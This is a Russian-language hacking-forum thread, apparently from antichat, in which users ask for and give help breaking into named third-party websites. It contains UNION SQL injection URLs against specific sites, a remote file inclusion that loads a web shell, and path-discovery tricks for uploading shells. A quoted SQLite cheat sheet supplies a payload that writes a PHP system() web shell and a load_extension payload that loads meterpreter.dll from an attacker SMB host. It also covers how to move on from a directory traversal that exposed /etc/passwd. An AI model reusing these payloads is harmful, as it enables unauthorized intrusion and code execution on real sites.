Code: http://testrrrrrrru-online.ru/?video=-989+union+select+1,2,3,4,5,6,7,8,9,10,11+-- Логинов/паролей нету, как и самой админки Code: http://testrrrrrrru-online.ru/?video=-989+union+select+1,2,File_Priv,4,5,6,7,8,9,10,11+from+mysql.user-- Это понимать как то что нету привилегий, или как то что что-то не так? Можно ли шелл залить?
Во первых, у вас нет ни файловых привилегий, ни доступа к mysql.user, с чего вы вообще решили возможность в таком случае файловых привилегий?! Во вторых, в бд ничего нет похожего связаного с доступом к админке
http://site.ru/index.php?http://myserver.ru/sys12.txt вижу свой шелл всо2, авторизируюсь - вижу листинг директорий при попытке совершить действия какие-либо, выкидывает на форму ввода пароля у шелла вижу директорию news с правами drwxrwxrwx - забиваю на шелл, пишу код под каждое конкретное действие: пытаюсть залиться туда wgetом - результата нет пытаюсь переименовать news/index.php - в .txt, что бы почитать код (там нет майсику.ль значит пасс в коде) - open basedir restriction каtaking effect( сервак поидее можно порутать, FreeBSD 3.3-RELEASE
+ поставь действие по умолчанию в шелле - консолька, и через неё совершай действия. Минимум - раскрытие путей, максимум - возможная инъекция в LIMIT 1,[inject]. Но надо смотреть.
Помогите. выполнил sql запрос как написано тут http://forum.antichat.ru/showpost.php?p=2064084&postcount=25 Теперь хочу узнать путь, куда залить шелл, помогите с php запросом, чтоб выполнил ls или просто узнать путь
ну как залить шелл там пример есть, а путь узнаешь сделав запрос echo realpath("."); ну или в phpinfo посмотреть.
ну если б вы внимательно читали пост M1ks, то не задавали бы такой "умный" вопрос. Он написал, что сделал sql запрос из этого поста http://forum.antichat.ru/showpost.php?p=2064084&postcount=25 Теперь ему надо залить шелл, а путь не знает по скольку он сделал этот sql запрос, можно узнать путь: profile.php?mode=editprofile&c=echo realpath("."); или вывести инфу пхп mode=editprofile&c=phpinfo(); и там смотреть путь.
доброго времени суток товарищи. скажите пожалуйста есть ли тут инъекция http://www.swtravel.az/index.php?ind=newsfull&id=118' если да то направьте на правильном пути , а то я не смог количество колонок подобрать
инъекция в SQLite. Обычная UNION-based. Никогда с ними не сталкивался. Таблы вытянул из sqlite_master. Как вытянуть колонки? Читал про какуй-то альтернативный метод залития шелла. LOAD_EXTENSION() Но не совсем понял, как он работает. Дайте доков по сабжу.
2 способа получения шелла на SQLite Getting Shell Trick 1 - ATTACH DATABASE What it says on the tin - lets you attach another database for your querying pleasure. Attach another known db on the filesystem that contains interesting stuff - e.g. a configuration database. Better yet - if the designated file doesn't exist, it will be created. You can create this file anywhere on the filesystem that you have write access to. PHP example: ?id=bob’; ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘<? system($_GET[‘cmd’]); ?>’;-- Then of course you can just visit lol.php?cmd=id and enjoy code exec! This requires stacked queries to be a goer. Теперь по-русски. Приведённый запрос пытается подключить дополнительную БД ( указанную в файле /var/www/lol.php ) в твой запрос к БД. Если этот файл отсутствует, он автоматически создастся - то, что нам и надо. Зависимости: MQ=off Full_path_disclosure=1 Getting Shell Trick 2 - SELECT load_extension Takes two arguments: A library (.dll for Windows, .so for NIX) An entry point (SQLITE_EXTENSION_INIT1 by default) This is great because This technique doesn't require stacked queries The obvious - you can load a DLL right off the bat (meterpreter.dll? Unfortunately, this component of SQLite is disabled in the libraries by default. SQLite devs saw the exploitability of this and turned it off. However, some custom libraries have it enabled - for example, one of the more popular Windows ODBC drivers. To make this even better, this particular injection works with UNC paths - so you can remotely load a nasty library over SMB (provided the target server can speak SMB to the Internets). Example: ?name=123 UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- В этом примере используется Samba протокол для доступа к хосту злоумышленника, где в качестве плагина для SQLite скачаивает "ядовитую" начинку. Тут нужно обратить внимание с какой ОС Вы имеете дело - либо Windows (тогда расширение у файла должно быть .dll ), либо Unix (расширение .so соответственно). Proof = _ttps://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet
Добрый день, помогите новичку Нашел directory traversal на сайте, прочитал файл /etc/passwd, (пароли в /etc/shadow не прочитал), нашел httpd.conf, посмотрел реврайт рулы, список виртуальных хостов и всякие другие дефолтные файлы. Прочитал /bin/sh, а вот как его запустить на выполнение? Или хотя-бы как-то посмотреть дерево каталогов и файлов. Короче, уткнулся в то, что не могу /bin/sh запустить на выполнение, но подозреваю, что это можно сделать, ведь его содержимое я прочитал. Спасибо